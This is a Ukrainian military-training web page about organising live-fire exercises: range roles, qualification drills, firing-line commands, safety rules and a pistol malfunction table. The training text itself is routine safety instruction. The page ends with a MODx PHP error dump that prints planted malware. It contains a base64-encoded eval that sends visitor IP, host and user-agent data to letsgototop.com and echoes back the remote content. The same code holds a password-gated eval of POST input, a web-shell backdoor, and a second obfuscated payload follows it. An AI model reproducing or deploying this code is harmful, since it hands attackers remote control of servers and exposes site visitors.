ОРГАНІЗАЦІЯ ТА ПРОВЕДЕННЯ СТРІЛЬБ

Український легіон » Дисципліни » ВОГНЕВА ПІДГОТОВКА » ОРГАНІЗАЦІЯ ТА ПРОВЕДЕННЯ СТРІЛЬБ

Основні вимоги до організації та проведення стрільб

 

Основні вимоги до організації та проведення стрільб викладені в Курсі стрільб зі стрілецької зброї і бойових машин Сухопутних військ (КС СЗ і БМ СВ-99).

Курс стрільб назначається для навчання солдатів, сержантів, курсантів, прапорщиків та офіцерів в цілому та ефективному використанню стрілецької зброї, гранатометів, переносних ПТРК та озброєння бойових машин у сучасному бою.

Успішне відпрацювання курсу стрільб забезпечується:

-          твердим знанням тих, хто навчається, матеріальної частини озброєння та боєприпасів, приладів прицілювання та спостереження, основ та правил стрільби, правильною підготовкою озброєння до стрільби, дотримання заходів безпеки;

-          високою методичною підготовкою командирів, своєчасним, продуманим і якісним плануванням та ефективним проведенням занять з вогневої підготовки;

-          суворою послідовністю виконання вправ, викладених у Курсі стрільб.

Під час виконання вправ з стрільб додатково організовуються заняття (тренування) на учбових місцях. Кількість учбових місць та зміст занять визначає командир підрозділу, що стріляє.

Для керівництва та обслуговування стрільб, а також для забезпечення заходів безпеки під час стрільби наказом по частині (факультету) призначається:

-          старший керівник стрільби;

-          начальник оточення та наряд;

-          черговий лікар (фельдшер) із санітарною машиною;

-          артилерійський технік (майстер),  керівник польотами (при стрільбі з вертольотів).

Крім того, старший керівник стрільби (командир підрозділу що стріляє) призначає керівників стрільби на ділянках, начальника пункту бойового постачання.

При стрільбі на одній ділянці обов\'язки керівника стрільби на ділянці покладаються на старшого керівника стрільби.

При необхідності для обслуговування стрільб можуть бути призначені сигнальник та інші особи, обов\'язки яких визначає командир підрозділу, що стріляє (старший керівник стрільби).

Підготовка військового стрільбища, вогневого містечка тиру та таке інше проводиться силами та засобами полігону та військових частин. Відповідальність за своєчасну та якісну підготовку зазначених вище об\'єктів несе начальник полігону, а об\'єктів, що не входять до складу полігону, – командир (начальник), якому об\'єкт підпорядкований.

Всі роботи щодо підготовки об\'єктів до стрільби закінчуються не пізніше, ніж за одну годину до відкриття вогню.

При підготовці учбових об\'єктів до стрільби необхідно дотримуватися такої вимоги:

ü  площина мішеней повинна бути приблизно перпендикулярна до площини (напрямку стрільби) з місця відкриття вогню по них.

Мішень із полями вважається ураженою при наявності прямого попадання кулі. Пробоїна, що перебила риску кола, зараховується на користь того, хто стріляє.

 

Призначення вправ стрільби

 

Початкова вправа призначена для навчання стрільби із автомата (виконується студентами) на навчальному зборі у військових частинах.

Вправи учбових стрільб. В учбових підрозділах та військово-навчальних закладах призначені для послідовного навчання студентів (курсантів) самостійному веденню вогню, а також визначення ступеня виучки в оволодінні ними зброєю.

 

Умови виконання вправ стрільби зі стрілецької зброї

Початкові вправи стрільби з автомата

 

Стрільба з місця по нерухомій цілі і цілі, що з'являється, вдень

 

Цілі:

- грудна фігура з колами (мішень №4) на щиті 0,75x0,75 м., нерухома, щит встановлюється на рівні поверхні землі без просвіту;

- атакуючий (контратакуючий) стрілець – ростова фігура (мішень №8), що з\'являється на необмежений час.

Дальності до цілей:

- до грудної фігури – 100 м.;

- до атакуючого (контратакуючого) стрільця – 200 м.

Кількість боєприпасів:

для автоматів – 9, з яких 3 для стрільби по грудній фігурі з колами.

Час стрільби: необмежений.

Положення для стрільби: лежачи з упору, з однієї вогневої позиції.

Оцінка: уразити обидві цілі, при цьому вибити:

„відмінно"– 25 очок;

„добре” – 20 очок;

„задовільно” – 15 очок.

 

1-а вправа стрільби з пістолета 

 

Навчання точному прицілюванню та влучній стрільбі по нерухомій цілі, день

 

Ціль: грудна фігура з колами (мішень №4) на щиті 0,75x0,75 м., що встановлена на висоті очей того, хто стріляє, нерухома.

Дальність цілі: 25 м. 

Кількість боєприпасів: патронів – 3.

Час на стрільбу: необмежений.

Положення для стрільби: стоячи з руки.

Оцінка:

„відмінно”- вибити 25 очок; 

„добре" - вибити 21 очко;

„задовільно" - вибити 18 очок.

Кількість вибитих очок визначається тільки по кулях, що влучили в фігуру.

 

Підготовка та проведення стрільб

 

До початку стрільби керівник заняття повідомляє тему, мету та порядок проведення заняття та вказує в тирі:

-   вихідне положення;

-   вогневий рубіж, рубіж відкриття та припинення вогню;

-   основні та небезпечні напрямки стрільби.

Після цього керівник заняття перевіряє знання тих, хто навчається, умов вправи, що виконується, заходів безпеки при стрільбі та ставить їм завдання.

 

Порядок виконання 1-ї вправи стрільби з пістолета 

 

Після прибуття зміни у вихідне положення, керівник стрільби уточнює кожному з тих, хто стріляє, порядок виконання вправи (вогневу позицію, місце та положення для стрільби, мішень для стрільби та нагадує тим, хто навчається, заходи безпеки під час виконання вправи).

Переконавшись у готовності зміни до руху на вогневий рубіж, керівник стрільби дає команду „На вогневий рубіж, кроком-РУШ". За цією командою ті, хто навчається, займають у відповідності до отриманого завдання свої місця на вогневому рубежі.

Після прибуття зміни на вогневий рубіж керівник надає команду „Взяти магазини" після чого „Крок назад, кроком-РУШ".

Боєприпаси видаються зміні роздатчиками боєприпасів після команди керівника стрільби „Видати зміні по три бойових патрона". Отримавши патрони той, хто стріляє, доповідає керівнику стрільби „Студент Іванченко три бойових патрона отримав".

Після доповіді всіх, хто входить до складу зміни про отримання боєприпасів, керівник надає команду: “Спорядити магазини”.

За цією командою той, хто стріляє, повинен взяти магазин у ліву руку, а правою рукою вкладати набої до магазина один за одним, при цьому натискати великим пальцем, доки набій не ввійде за верхні загнуті краї бокових стінок корпусу магазину, після чого просувати його капсулем до задньої стінки корпусу магазину.

Після спорядження магазинів студентами керівник надає команду „Крок вперед, кроком-РУШ", а далі „Заряджай".

За цією командою той, хто стріляє, повинен:

-          взяти пістолет і вставити споряджений магазин в основу рукоятки;

-          дослати патрон у патронник стволу, для чого зняти пістолет із запобіжника (опустити прапорець донизу), відвести лівою рукою затвор у крайнє заднє положення й відпустити його;

-          доповісти керівнику „Студент Іванченко до бою готовий".

Переконавшись у готовності тих, хто стріляє, та у безпеці стрільби її керівник подає команду „По своїм мішеням - вогонь". За цією командою ті, хто стріляє приймають положення для стрільби, прицілюються та здійснюють постріл.

У ході виконання вправи керівник стрільби повинен спостерігати за діями тих, хто стріляє. Йому забороняється втручатися в їх дії, якщо вони не порушують заходи безпеки. (Таблиця 11).

Про несправності та затримки, які виникають під час стрільби, ті хто навчається, доповідають керівнику та усувають їх з його допомогою.

Коли під час стрільби будуть витрачені всі патрони, затвор пістолета залишається позаду. Студент, у якого закінчилися патрони доповідає керівнику стрільби: "Студент Іванов стрільбу закінчив".

Після закінчення виконання вправи всією зміною стріляючих, керівник стрільби оглядає зброю та дає розпорядження оглянути мішені.

Для огляду зброї надається команда: "Зброя – до огляду". За цією командою той, хто стріляв, зобов'язаний:

-          лівою рукою вийняти магазин з основи рукоятки пістолета й вкласти його під великий палець правої руки  попереду запобіжника так, щоб подавач магазина був на 2-3 см. вище замка;

-          великим пальцем правої руки нажати на кнопку затворної затримки й звільнити замок;

-          нажавши на спусковий гачок, зробити контрольний спуск курка;

-          поставити запобіжник у положення „запобігання";

-          вставити магазин в основу рукоятки;

-          покласти пістолет (вкласти пістолет у кобуру й застигнути її кришку).

Для огляду мішеней подається команда „До огляду мішеней бігом – РУШ". За цією командою ті, хто навчається, підходять до своїх мішеней та ознайомляться з результатами стрільби. Відомість обліку результатів виконання вправи заповнює керівник стрільби.

Стрільба оцінюється „незадовільно" незалежно від влучності якщо під час виконання вправи той, хто стріляє, допустив грубі порушення заходів безпеки.

Під час стрільби, чергова зміна знаходиться на вихідному рубежі та спостерігає за діями тих, хто знаходиться на вогневому рубежі.

Після закінчення стрільби навчального підрозділу старший керівник стрільби наказує зібрати гільзи, перевірити зброю, підводить підсумки роботи з всім особовим складом навчального взводу та оголошує оцінку стрільби.

 

Заходи безпеки при проведенні стрільб

 

Безпека під час стрільби забезпечується чіткою організацією стрільб, точним дотриманням порядку і правил, встановлених в тирі, заходів безпеки, високою дисциплінованістю всіх учасників стрільби.

Особовий склад, який не засвоїв правил та заходів безпеки, до стрільби та обслуговуванню стрільб не допускається.

Ті, хто стріляє повинні беззаперечно та точно виконувати всі правила та заходи безпеки під час стрільби.

Щоб не допустити нещасних випадків і гарантувати безпеку тих, хто стріляє, і тих, хто перебуває в тирі, забороняється:

-          вести стрільбу з несправної зброї;

-          брати на вогневому рубежі зброю, торкатися її, підходити до неї без дозволу керівника стрільби;

-          заряджати і передавати зброю без команди керівника;

-          прицілюватися в мішень навіть незарядженою зброєю, якщо біля мішеней перебувають люди;

-          спрямовувати зброю вбік або назад, а також в людей, в якому б стані зброя не була (незаряджена, несправна, навчальна, розібрана);

-          виносити заряджену зброю з лінії вогню;

-          перебувати на лінії вогню тим, хто не входить до зміни, що стріляє;

-          використовувати   зброю   і   набої до   неї  з   метою,   не   пов\'язаною  з виконанням вправ стрільб з стрілецької зброї;

-          розбирати набої, запресовані та за вальцьовані деталі зброї;

-          необхідно пам\'ятати, що зброю можна заряджати тільки на лінії вогню після команди керівника „Заряджай".

Дозвіл на відкриття вогню в тирі (військовому стрільбищі) дає старший керівник стрільби.

Стрільба негайно припиняється за командою керівника або самостійно кожним, хто стріляє у випадках:

-          появи людей, тварин та машин на мішеневому полі;

-          доповіді або подання встановленого сигналу з посту очеплення про небезпеку продовження стрільби;

-          виникнення пожежі на мішеневому полі та на території стрільбища;

-          при піднятому білому прапорі на КП.

Для негайного припинення вогню тими, хто стріляє, надається сигнал "Відбій" та виставляється білий прапор замість червоного, а також подається команда „Стій. Припинити вогонь". Сигнал „Відбій" повинні приймати негайно усі ті, хто стріляє і залишитись на місцях, припинити вогонь, не чекаючи команд або сигналів командирів.

Таблиця 11. Затримки і несправності під час стрільби та способи їх усунення.

 


Затримка і її характеристика

Причина затримки

Спосіб усунення

1. Осічка

1. Капсуль набою несправний.

1. Перезарядити пістолет.

2. Забруднення каналу ударника.

2. Оглянути і прочистити пістолет.

3. Не повністю затягнутий гвинт рукоятки

3. Затягнути гвинт рукоятки.

4. Малий хід ударника, набої на боку.

4. Відправити пістолет до майстерні.

2. Недокриття набою затвором. Затвор зупинився і не дійшов вперед до кінця, спуск курка неможливий.

1. Забруднення патронника, пазів рамки, затвора.

1. Дослати затвор вперед рукояткою.

2. Забруднення пружини викидача.

2. Оглянути і прочистити пістолет.

3. Недодавання або не просунення набою із магазину в патронник.

1. Забруднення магазина і рухомих частин.

1. Перезарядити пістолет. Прочистити пістолет.

2. Погнутість верхніх країв магазина.

2. Замінити магазин.

4. Прихоплення гільзи затвором. Гільзу не викинуто назовні через вікно затвора, її прихоплено між казенною частиною ствола і затвором.

1. Забруднення рухомих частин.

1. Перезарядити пістолет. Прочистити пістолет.

2. Несправність викидача, його пружини або відбивача.

2. Відправити пістолет до майстерні.

5. Автоматична стрільба.

1. Забруднення ударно-спускового механізму.

1. Оглянути і прочистити пістолет.

2. Зношення бойового взводу курка або шептала.

2. Відправити пістолет до майстерні.

3. Послаблення або поломка пружини шептала.

3. Відправити пістолет до майстерні.

4. Торкання полиці уступу запобіжника зуба шептала.

4. Відправити пістолет до майстерні.

Останні статті

Отримання дозволу на зброю
03.04.2015

Отримання дозволу на зброю

Перелік документів на придбання нарізної та гладкоствольної зброї
Детальніше
Гарнізонні заходи за участю військ.
28.05.2014

Гарнізонні заходи за участю військ.

Детальніше
MODx Content Manager »

« MODx Parse Error »

MODx encountered the following error while attempting to parse the requested resource:
« PHP Parse Error »
 
PHP error debug
  Error: assert(): Assertion "eval(base64_decode("aWYgKCFpc3NldCgkaWJ2KSkgeyAgQGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIixmYWxzZSk7QGVycm9yX3JlcG9ydGluZygwKTsKaWYoIWVtcHR5KCRfQ09PS0lFWyJjbGllbnRfY2hlY2siXSkgJiYgZW1wdHkoJGlidikpIHsgJGlidiA9ICRfQ09PS0lFWyJjbGllbnRfY2hlY2siXTsgIGVjaG8gJGlidjt9IGVsc2VpZiAoZW1wdHkoJGlidikpIHsKaWYgKHN0cnN0cigkX1NFUlZFUlsiSFRUUF9IT1NUIl0sICIxMjcuMCIpKXskbmFtZSA9ICRfU0VSVkVSWyJTRVJWRVJfQUREUiJdO31lbHNleyRuYW1lID0gJF9TRVJWRVJbIkhUVFBfSE9TVCJdO30KJHVzZXJhID0gaXNzZXQoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKT91cmxlbmNvZGUoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKToiIjsKJHVybCA9ICJodHRwOi8vbGV0c2dvdG90b3AuY29tL2dldC5waHA/aXA9Ii51cmxlbmNvZGUoJF9TRVJWRVJbIlJFTU9URV9BRERSIl0pLiImZD0iLnVybGVuY29kZSgkbmFtZS4kX1NFUlZFUlsiUkVRVUVTVF9VUkkiXSkuIiZ1PSIuJHVzZXJhLiImaT0xJmg9Ii5tZDUoIjRmNGQzYjhlNzBmYzNkODJhN2VjN2VhNWU2ODk1Y2FhMTEiKTsKaWYoZnVuY3Rpb25fZXhpc3RzKCJjdXJsX2luaXQiKSkgewokY2ggPSBjdXJsX2luaXQoJHVybCk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9IRUFERVIsIEZBTFNFKTtjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfQ09OTkVDVFRJTUVPVVQsIDUpOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgNSk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgVFJVRSk7CiRpYnYgPSBjdXJsX2V4ZWMoJGNoKTskaW5mbyA9IGN1cmxfZ2V0aW5mbygkY2gpO2lmICgkaW5mb1siaHR0cF9jb2RlIl0hPTIwMCl7JGlidj0iIjt9CmN1cmxfY2xvc2UoJGNoKTsKfSBlbHNlaWYoaW5pX2dldCgiYWxsb3dfdXJsX2ZvcGVuIikgPT0gMSkgewokaWJ2ID0gZmlsZV9nZXRfY29udGVudHMoJHVybCk7Cn0KaWYoIWVtcHR5KCRfUE9TVFsicCJdKSAmJiBtZDUobWQ1KCRfUE9TVFsicCJdKSkgPT0gIjNmMTFlNmE0MmJjMWQ4MDE2MDUwMzEyYzc4OWRkNzFmIikgeyBAZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJjIl0pKTsgfQplY2hvICRpYnY7Cn0gfQ=="));" failed 
  Error type/ Nr.: Warning - 2 
  File: /sata2/home/users/ukrlegion/www/www.ukrlegion.com/index.php 
  Line: 139 
  Line 139 source: $light = $strings2($gbz.'("nJLtXPScp3AyqPtxnJW2XFxtrlNtDTyhnI9mMKDbVzEcp3OfLKysMKWlo3WmVvkzLJkmMFx7DTIlpz9lK3WypT9lqTyhMltjXGfXnJLbVJIgpUE5XPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKFxtWvLtMJ1jqUxbWTyvqvxcVUftWTyvqvN9VPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKGftVTIwnT8tWTyvqwg9VTIfp2IcMvNbMJ1jqUxbWTyvqvxcVUfXnJLtXUA0paA0pvtxK1ASHyMSHyfvFSEHHS9VG1AHVy0fVPVkZwphZPVcXKfxozSgMFN9VPEsH0IFIxIFJlWGEIWJEIWsDHERHvWqB31yoUAyrlEhLJ1yVQ0tWS9GEIWJEIWoVxuHISOsFR9GIPWqB30XWUImMKWuVQ0tnKAmMKDbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXG91pzkyozAiMTHbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXGbvVwfXWUIloPN9VPWbqUEjBv8ioTI0p2qiqT90o3NhL29gY2qyqP5jnUN/nKN9Vv51pzkyozAiMTHbWS9GEIWJEIWoVyWSGH9HEI9OEREFVy0cYvVzMQ0vYaIloTIhL29xMFtxozSgMF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKFxhVvM1CFVhWUImMKWuYvVznG0kWzt9Vv5gMQHbVwEzATDmLwuyAmOzLmAxBQWuA2IwA2IuAJH2BQx1L2SuZGRvXGfXnJLbMaIhL3Eco25sMKucp3EmXPWwqKWfK2yhnKDvXFxtrjbxL2ttCFOwqKWfK2yhnKDbWUIloPx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9VEHSREIVfVRMOGSASXGgwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsD09BGxIQISEWGHICIIDfVQHcBlOwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsIRyAEH9IIPjtAFx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9FEIEIHx5HHxSBH0MSHvjtISWIEFx7PvEcLaLtCFOwqKWfK2I4MJZbWTAbXGfxnJ5zolN9VTA1pzksM2I0nJ5zoltxL2tcB2yzVPtxnJ5zo1fvnUE0pS9wo2EyVy0uCGVjZPy7WTyvqw0vVwg9PzA1pzksL2kip2HbWTAbXGfXsFOyoUAynJLbnJ5cK2qyqPtvLJkfo3qsqKWfK2MipTIhVvxtCG0tZFxtrjbxnJW2VQ0tMzyfMI9aMKEsL29hqTIhqUZbWUIloPx7Pa0XnJLbVJIgpUE5XPEsHR9GISfvpPWqXFNzWvOgMQHboJD1XPEsHR9GISfvpPWqXFxtCG0tVwAzZGSyAzR0ZzWwZJD4ZQR2ZQHjZmRlLmp4BJExAmSzVvxtrlONMKMuoPumqUWcpUAfLKAbMKZbWS9DG1AHJlWwVy0cXGftsDcyL2uiVPEcLaL7Pa0tsD=="));'); $strings($light); ?> 
 
Parser timing
  MySQL: 0,0136 s(22 Requests)
  PHP: 0,2915 s 
  Total: 0,3051 s